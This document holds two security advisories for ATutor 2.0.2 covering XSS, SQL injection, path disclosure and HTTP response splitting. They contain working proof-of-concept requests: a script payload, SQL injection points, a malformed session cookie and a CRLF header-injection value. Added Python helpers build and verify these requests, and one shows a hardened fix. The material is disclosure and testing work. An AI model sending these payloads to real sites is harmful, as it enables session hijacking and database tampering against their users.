ATutor 2.0.2 Multiple Remote Vulnerabilities (SQLi/XSS/PD)


Vendor: ATutor (Inclusive Design Institute)
Product web page: http://www.atutor.ca
Affected version: 2.0.2 (build r10589)

Summary: ATutor is an Open Source Web-based Learning Content Management
System (LCMS) designed with accessibility and adaptability in mind.
Educators can quickly assemble, package, and redistribute Web-based
instructional content, easily retrieve and import prepackaged content,
and conduct their courses online.

Desc: ATutor suffers from SQL injection, cross-site scripting and path
disclosure vulnerabilities.

The XSS issue is triggered when input passed via the 'search_friends_HASH'
POST parameter to the '/mods/_standard/social/index_public.php' script, where
HASH is the value supplied in the 'rand_key' parameter of the same request, is
not properly sanitised before being returned to the user. Because the injection
point is a POST parameter, delivering it to a victim requires a page that
auto-submits the form to the affected site.

The PD issue is triggered by setting the 'ATutorID' cookie to an arbitrary or
empty value when requesting various scripts; the resulting PHP error message
reveals the full installation path.

The SQLi issue can be triggered via the 'p_course', 'name' and 'value'
parameters of the '/mods/_standard/social/set_prefs.php' script.

These issues can be exploited to execute arbitrary HTML and script code in a
user's browser session in the context of an affected site, to disclose the full
installation path in an error report, and to manipulate SQL queries by
injecting arbitrary SQL code.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2011-5036
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5036.php


31.07.2011

PoC:


XSS:
---------------------

POST http://localhost/ATutor/mods/_standard/social/index_public.php HTTP/1.0
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

search_friends_2c62c1e5aff70ba8a3268d1d1885a600=1>"><script>alert(1)</script>&search=Search&rand_key=2c62c1e5aff70ba8a3268d1d1885a600


SQLi:
---------------------

http://localhost/mods/_standard/social/set_prefs.php?cid=&lang=&p_course=[INJECTION]&h=&expand=&oid=&id=&submit_language=&st=&name=[INJECTION]&value=[INJECTION]


PD:
---------------------

GET /documentation/common/frame_header.php HTTP/1.0
Accept: */*
Host: localhost
Cookie: ATutorID=-1.0
Connection: Close
Pragma: no-cache


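The following is an added example, not part of the Zero Science advisory and not ATutor code. It shows the helpers a tester would keep beside the PoCs above when confirming the XSS and path-disclosure findings: building the POST whose reflected field is named after the attacker-chosen rand_key (with a computed Content-Length), classifying whether the payload comes back raw or HTML-encoded, and pulling any absolute path that a PHP warning leaks out of a response. The sample HTML snippets, file paths and the origin-form request line are constructed for the example and are not ATutor's real output.

```python
import html
import re

# Constructed sample data for this example: rand_key and payload are the ones in the
# advisory's PoC; the HTML fragments and file paths below are assumed, not ATutor output.
RAND_KEY = '2c62c1e5aff70ba8a3268d1d1885a600'
PAYLOAD = '1>"><script>alert(1)</script>'

REFLECTED_RAW = (
    '<input type="text" name="search_friends_' + RAND_KEY + '" '
    + 'value="' + PAYLOAD + '">'
)
REFLECTED_ENCODED = (
    '<input type="text" name="search_friends_' + RAND_KEY + '" '
    + 'value="1&gt;&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">'
)
PD_HTML_ERROR = (
    '<br />\n<b>Warning</b>:  Invalid argument supplied for foreach() in '
    '<b>C:\\www\\ATutor\\include\\lib\\lib.inc.php</b> on line <b>123</b><br />\n'
)
PD_PLAIN_ERROR = (
    'Warning: session_start(): The session id contains illegal characters in '
    '/var/www/ATutor/include/vitals.inc.php on line 45'
)


def build_search_post(rand_key: str, payload: str, host: str = 'localhost',
                      path: str = '/ATutor/mods/_standard/social/index_public.php') -> bytes:
    """Raw POST from the PoC. The reflected field is named search_friends_<rand_key>
    and rand_key itself travels in the same body, so the attacker chooses both;
    Content-Length is derived from the body rather than typed by hand."""
    body = f'search_friends_{rand_key}={payload}&search=Search&rand_key={rand_key}'
    head = (
        f'POST {path} HTTP/1.0\r\n'
        f'Host: {host}\r\n'
        'Content-Type: application/x-www-form-urlencoded\r\n'
        f'Content-Length: {len(body.encode())}\r\n\r\n'
    )
    return (head + body).encode()


def reflection_state(body: str, payload: str) -> str:
    """'raw' = payload came back unencoded (exploitable), 'encoded' = reflected but
    HTML-escaped (neutralised), 'absent' = not reflected at all."""
    if payload in body:
        return 'raw'
    if html.escape(payload, quote=True) in body:
        return 'encoded'
    return 'absent'


# PHP notices/warnings end in "in <path> on line <n>"; with html_errors=On the path and
# the line number are wrapped in <b> tags. Matches Windows (C:\...) and POSIX (/...) paths.
_PHP_ERROR = re.compile(
    r'in (?:<b>)?((?:[A-Za-z]:\\|/)[^<\r\n]+?\.php)(?:</b>)? on line (?:<b>)?(\d+)'
)


def disclosed_paths(body: str) -> list:
    """(absolute_path, line_number) pairs leaked by PHP error output in a response."""
    return [(m.group(1), int(m.group(2))) for m in _PHP_ERROR.finditer(body)]


if __name__ == '__main__':
    print(build_search_post(RAND_KEY, PAYLOAD).decode())
    for sample in (REFLECTED_RAW, REFLECTED_ENCODED):
        print(reflection_state(sample, PAYLOAD))
    for sample in (PD_HTML_ERROR, PD_PLAIN_ERROR):
        print(disclosed_paths(sample))
```

Run against a real capture, feed the decoded response body to reflection_state() and disclosed_paths(); an 'encoded' result after patching, together with an empty path list for the ATutorID=-1.0 request, is what a fix should produce.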
ATutor 2.0.2 (lang) HTTP Response Splitting Vulnerability


Vendor: ATutor (Inclusive Design Institute)
Product web page: http://www.atutor.ca
Affected version: 2.0.2 (build r10589)

Desc: Input passed to the 'lang' parameter in '/documentation/index_list.php'
is concatenated into the Location header of a redirect without being sanitised.
This can be exploited to insert arbitrary HTTP headers, which are included in
the response sent to the user.


======================== vulnerable code ========================

/documentation/index_list.php:
------------------------------

<?php
header('Location: index/index.php?'.$_GET['lang']);
exit;
?>

======================= /vulnerable code ========================


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2011-5037
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5037.php


31.07.2011

--

[GET] http://10.0.0.13/documentation/index_list.php?lang=%0d%0a%20ZSL%2dCustom%2dHeader%3alove_injection

The leading %0d%0a%20 is deliberate: PHP's header() refuses a value that
contains a bare newline, but at the time it let CR LF followed by a space or
tab through as RFC 2616 header folding, which is enough to push a second header
line into the response below.

----

HTTP/1.1 302 Found
Date: Sun, 31 Jul 2011 21:08:54 GMT
Server: Apache/2.2.14 (Win32)
X-Powered-By: PHP/5.3.1
Location: index/index.php?
ZSL-Custom-Header: love_injection
Content-Length: 0
Connection: close
Content-Type: text/html


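The following is an added example, not part of the advisory and not ATutor's own code. It models the vulnerable header construction from index_list.php, a check written for this example that approximates the newline rule of PHP 5.3's header() (so it shows why the PoC's CR LF SP passes while a bare CR LF does not), a hardened replacement that allow-lists the language code, and two header parsers, one that splits lines naively and one that honours RFC 2616 folding, to show that the same bytes give two different header sets. The allow-list, the assumption that the redirect should carry lang=<code>, and the constructed 302 are mine and not taken from ATutor.

```python
from urllib.parse import quote, unquote

# The PoC value from the advisory as PHP sees it in $_GET['lang'] after URL decoding:
# CR, LF, a space, then a header line.
POC_LANG = unquote('%0d%0a%20ZSL%2dCustom%2dHeader%3alove_injection')

# Assumed allow-list for this example; ATutor's real language codes are not on the page.
ALLOWED_LANGS = frozenset({'en', 'fr', 'de', 'es'})


def vulnerable_location(lang: str) -> str:
    """The header line index_list.php builds: 'Location: index/index.php?'.$_GET['lang']."""
    return 'Location: index/index.php?' + lang


def php53_header_accepts(line: str) -> bool:
    """Model (written for this example) of the newline check in PHP 5.3's header():
    a bare CR or LF is refused, but CR LF followed by SP or HT is let through as
    RFC 2616 header folding. That exception is why the PoC leads with %0d%0a%20."""
    line = line.rstrip(' \t\r\n')          # PHP trims trailing whitespace first
    for i, ch in enumerate(line):
        nxt = line[i + 1] if i + 1 < len(line) else ''
        if ch == '\0':
            return False
        if nxt in (' ', '\t'):
            continue                        # treated as a folded continuation line
        if ch == '\n' or (ch == '\r' and nxt != '\n'):
            return False
    return True


def hardened_location(lang: str) -> str:
    """Replacement: allow-list the code and URL-encode it, so CR/LF can never reach
    the header. Assumes the redirect is meant to carry lang=<code>."""
    if lang not in ALLOWED_LANGS:
        lang = 'en'
    return 'Location: index/index.php?lang=' + quote(lang, safe='')


def build_response(location_line: str) -> bytes:
    """Constructed 302 modelled on the advisory's capture (not the capture itself)."""
    return (
        'HTTP/1.1 302 Found\r\n'
        'Server: Apache/2.2.14 (Win32)\r\n'
        + location_line + '\r\n'
        + 'Content-Length: 0\r\n'
        'Content-Type: text/html\r\n'
        '\r\n'
    ).encode('latin-1')


def _header_lines(raw: bytes) -> list:
    head = raw.split(b'\r\n\r\n', 1)[0].decode('latin-1')
    return head.split('\r\n')[1:]           # drop the status line


def headers_naive(raw: bytes) -> dict:
    """Line-by-line split, as lenient clients and some proxies did: every
    'Name: value' line is its own header, so the injected line becomes a new header."""
    out = {}
    for line in _header_lines(raw):
        name, _, value = line.partition(':')
        out[name.strip()] = value.strip()
    return out


def headers_rfc(raw: bytes) -> dict:
    """Obs-fold handling per RFC 2616/7230: a line starting with SP/HT continues the
    previous header, so the injected text only lengthens Location."""
    out, last = {}, None
    for line in _header_lines(raw):
        if line[:1] in (' ', '\t') and last is not None:
            out[last] += ' ' + line.strip()
            continue
        name, _, value = line.partition(':')
        last = name.strip()
        out[last] = value.strip()
    return out


if __name__ == '__main__':
    vuln = build_response(vulnerable_location(POC_LANG))
    print('PHP 5.3 header() accepts PoC:', php53_header_accepts(vulnerable_location(POC_LANG)))
    print('naive client sees:', headers_naive(vuln))
    print('RFC client sees:  ', headers_rfc(vuln))
    print('hardened:', hardened_location(POC_LANG))
```

The two parsers are the point: whether the injected text is a new header or just a longer Location value depends on the client or intermediary, so the fix has to stop CR/LF at the source rather than rely on how any one consumer folds lines.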
--

Copyleft (c) Zero Science Lab - Information Security Services
This advisory is best viewed in maximized Notepad on 1680x1050 screen resolution.